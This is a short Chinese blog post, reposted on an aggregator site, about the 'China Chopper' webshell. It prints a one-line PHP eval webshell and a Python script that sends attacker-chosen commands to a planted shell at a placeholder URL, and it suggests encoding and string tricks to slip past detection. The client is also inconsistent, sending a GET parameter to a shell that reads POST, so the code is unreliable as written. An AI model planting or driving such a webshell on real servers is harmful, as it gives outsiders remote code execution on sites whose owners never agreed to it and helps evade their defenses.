首页 > 其他 > 详细

关于中国菜刀,如何"切菜"

时间:2017-06-26 12:28:25      阅读:341      评论:0      收藏:0      [点我收藏+]

0x00  菜

关于一句话木马肯定是眼熟能详,一句话木马如下:

<?PHP eval($_POST[w]);?>

0x01  刀

一把西瓜刀如下:

# -*-coding=utf-8-*-
# /usr/bin/python

import sys
import requests


def encodePayload(payload):
    #请尽情蹂躏payload
    return str(payload)


cmd = sys.argv[1]
payload = encodePayload(cmd)
url = "www.xxx.com/1.php?w="+ payload
req = requests.get(url)
print req.text

 

本质上算是代码注入。

0x02 如果进行绕过呢?

需要人员在满足编程语法规则上,尽情蹂躏代码。举个栗子:编码转换、字符串拼接、特殊符号等等。

博主正在想栗子...

关于中国菜刀,如何"切菜"

原文:http://www.cnblogs.com/MiWhite/p/7079486.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!